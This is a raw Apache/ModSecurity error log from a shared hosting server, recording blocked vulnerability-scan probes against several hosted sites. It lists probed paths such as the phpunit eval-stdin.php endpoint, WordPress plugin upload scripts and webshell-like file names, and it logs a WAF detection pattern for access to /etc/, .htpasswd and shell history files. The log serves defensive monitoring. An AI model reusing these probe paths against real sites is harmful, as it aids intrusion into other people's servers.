[Tue May 26 12:51:14.391785 2026] [security2:error] [pid 448967:tid 449137] [client 23.94.40.119:35122] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/webadmin/auth/verification.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_egAAACg"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/webadmin/start/
[Tue May 26 12:51:14.393705 2026] [security2:error] [pid 448967:tid 449126] [client 23.94.40.119:35106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_ewAAAB0"]
[Tue May 26 12:51:14.643823 2026] [security2:error] [pid 448967:tid 449182] [client 23.94.40.119:35128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_hQAAAFU"]
[Tue May 26 12:51:14.775395 2026] [security2:error] [pid 448967:tid 449161] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cQAAAEA"]
[Tue May 26 12:51:15.093855 2026] [security2:error] [pid 448967:tid 449212] [client 23.94.40.119:35172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ6-XLPuWQsfM-UVS_nAAAAHM"]
[Tue May 26 12:51:15.356099 2026] [security2:error] [pid 448967:tid 449201] [client 23.94.40.119:35192] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6-XLPuWQsfM-UVS_owAAAGg"]
[Tue May 26 12:51:15.617420 2026] [security2:error] [pid 448967:tid 449193] [client 23.94.40.119:35198] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6-XLPuWQsfM-UVS_qgAAAGA"]
[Tue May 26 12:51:15.924482 2026] [security2:error] [pid 448967:tid 449211] [client 23.94.40.119:35202] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgibin/webproc"] [unique_id "ahVJ6-XLPuWQsfM-UVS_sQAAAHI"]
[Tue May 26 12:51:16.227637 2026] [security2:error] [pid 448967:tid 449178] [client 23.94.40.119:35230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_uwAAAFE"]
[Tue May 26 12:51:16.481873 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:35232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_xAAAAAo"]
[Tue May 26 12:51:16.496153 2026] [security2:error] [pid 448967:tid 449168] [client 23.94.40.119:35234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_xgAAAEc"]
[Tue May 26 12:51:16.641207 2026] [security2:error] [pid 448967:tid 449120] [client 23.94.40.119:35244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_zwAAABc"]
[Tue May 26 12:51:16.740403 2026] [security2:error] [pid 448967:tid 449180] [client 23.94.40.119:35250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/showbizpro/temp/update_extract/p1JnL.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_2QAAAFM"]
[Tue May 26 12:51:17.008166 2026] [security2:error] [pid 448967:tid 449123] [client 14.236.37.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_1QAAABo"]
[Tue May 26 12:51:17.110143 2026] [security2:error] [pid 448967:tid 449117] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_0gAAABQ"]
[Tue May 26 12:51:17.511160 2026] [security2:error] [pid 448967:tid 449184] [client 23.94.40.119:35282] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wsecure/wsecure-config.php"] [unique_id "ahVJ7eXLPuWQsfM-UVS_8gAAAFc"]
[Tue May 26 12:51:17.527288 2026] [security2:error] [pid 448967:tid 449171] [client 23.94.40.119:35290] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/mainwp-vuln/readme.txt"] [unique_id "ahVJ7eXLPuWQsfM-UVS_9AAAAEo"]
[Tue May 26 12:51:17.528519 2026] [security2:error] [pid 448967:tid 449155] [client 195.178.110.34:59774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ7eXLPuWQsfM-UVS_8wAAADo"]
[Tue May 26 12:51:17.743414 2026] [autoindex:error] [pid 448967:tid 449210] [client 147.185.132.120:0] AH01276: Cannot serve directory /home1/taote1zo/moremi.taotechservices.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:51:17.846580 2026] [security2:error] [pid 448967:tid 449191] [client 23.94.40.119:43092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTAAgAAAF4"]
[Tue May 26 12:51:17.882045 2026] [security2:error] [pid 448967:tid 449138] [client 23.94.40.119:43100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-mobile-detector/resize.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTABgAAACk"]
[Tue May 26 12:51:17.967321 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:43114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/boardDataWW.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTABwAAAAo"]
[Tue May 26 12:51:18.183533 2026] [security2:error] [pid 448967:tid 449109] [client 23.94.40.119:43122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/post_files/3efh8e0rmokkjbqeufa2p5ic1rs.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAEAAAAAw"]
[Tue May 26 12:51:18.475445 2026] [security2:error] [pid 448967:tid 449203] [client 23.94.40.119:43132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAGwAAAGo"]
[Tue May 26 12:51:18.630326 2026] [security2:error] [pid 448967:tid 449163] [client 23.94.40.119:43176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAHwAAAEI"]
[Tue May 26 12:51:18.689269 2026] [security2:error] [pid 448967:tid 449114] [client 23.94.40.119:43186] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAJgAAABE"]
[Tue May 26 12:51:18.750492 2026] [security2:error] [pid 448967:tid 449211] [client 23.94.40.119:43188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/user_uploads/3efh8e0rmokkjbqeufa2p5ic1rs.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAKQAAAHI"]
[Tue May 26 12:51:18.890853 2026] [security2:error] [pid 448967:tid 449156] [client 23.94.40.119:43194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTALQAAADs"]
[Tue May 26 12:51:20.502500 2026] [security2:error] [pid 448967:tid 449183] [client 91.226.164.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8OXLPuWQsfM-UVTAWAAAAFY"]
[Tue May 26 12:51:20.536929 2026] [security2:error] [pid 448967:tid 449199] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8OXLPuWQsfM-UVTAXgAAAGY"]
[Tue May 26 12:51:21.310732 2026] [security2:error] [pid 448967:tid 449174] [client 157.20.138.61:53774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ8eXLPuWQsfM-UVTAfgAAAE0"]
[Tue May 26 12:51:21.310844 2026] [security2:error] [pid 448967:tid 449174] [client 157.20.138.61:53774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ8eXLPuWQsfM-UVTAfgAAAE0"]
[Tue May 26 12:51:22.098049 2026] [security2:error] [pid 448967:tid 449198] [client 23.94.40.119:43250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/invoker/EJBInvokerServlet/"] [unique_id "ahVJ8uXLPuWQsfM-UVTAlAAAAGU"]
[Tue May 26 12:51:23.336147 2026] [security2:error] [pid 448967:tid 449097] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8uXLPuWQsfM-UVTAqQAAAAA"]
[Tue May 26 12:51:25.092546 2026] [security2:error] [pid 448967:tid 449222] [client 23.94.40.119:43330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/maint/modules/home/index.php"] [unique_id "ahVJ9eXLPuWQsfM-UVTA4QAAAH0"]
[Tue May 26 12:51:25.609271 2026] [security2:error] [pid 448967:tid 449153] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ9eXLPuWQsfM-UVTA5AAAADg"]
[Tue May 26 12:51:25.940420 2026] [cgid:error] [pid 448967:tid 449201] [client 23.94.40.119:43346] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/DownloadCfg: script not found or unable to stat
[Tue May 26 12:51:26.409164 2026] [security2:error] [pid 448967:tid 449157] [client 23.94.40.119:43364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/3EFh8CzLwoO1801BMIgyzRbHxfd.php%5Cx0A"] [unique_id "ahVJ9uXLPuWQsfM-UVTBAQAAADw"]
[Tue May 26 12:51:28.009715 2026] [security2:error] [pid 448967:tid 449218] [client 23.94.40.119:46848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/|/\\\\.(?:history|bash_history|sh_history)$)" at REQUEST_HEADERS:Content-Type. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "218"] [id "390719"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ-OXLPuWQsfM-UVTBMAAAAHk"]
[Tue May 26 12:51:28.643090 2026] [security2:error] [pid 448967:tid 449197] [client 23.94.40.119:46890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/clients/editclient.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBTAAAAGQ"]
[Tue May 26 12:51:28.901021 2026] [security2:error] [pid 448967:tid 449125] [client 23.94.40.119:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/logos_clients/3EFh8G5qcEVAgXekljtZaEcwjKM.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBUAAAABw"]
[Tue May 26 12:51:28.910553 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBRgAAABo"]
[Tue May 26 12:51:29.640310 2026] [http2:info] [pid 461618:tid 461618] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:51:31.820198 2026] [security2:error] [pid 461618:tid 461842] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2ZzQAAAOM"]
[Tue May 26 12:51:31.961635 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:54141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2Z5gAAAPY"]
[Tue May 26 12:51:31.961785 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:54141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2Z5gAAAPY"]
[Tue May 26 12:51:32.660568 2026] [security2:error] [pid 461618:tid 461790] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ_FyiSlSCHr1fdr2Z8gAAAK8"]
[Tue May 26 12:51:33.144988 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:47042] ModSecurity: Warning. Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVJ_VyiSlSCHr1fdr2aAgAAAMQ"]
[Tue May 26 12:51:34.571169 2026] [security2:error] [pid 461618:tid 461650] [remote 45.250.255.226:48974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aLAAA-R8"]
[Tue May 26 12:51:34.614565 2026] [security2:error] [pid 461618:tid 461762] [client 23.94.40.119:47050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aPAAAAJM"]
[Tue May 26 12:51:34.922571 2026] [security2:error] [pid 461618:tid 461813] [client 23.94.40.119:47060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aQQAAAMY"]
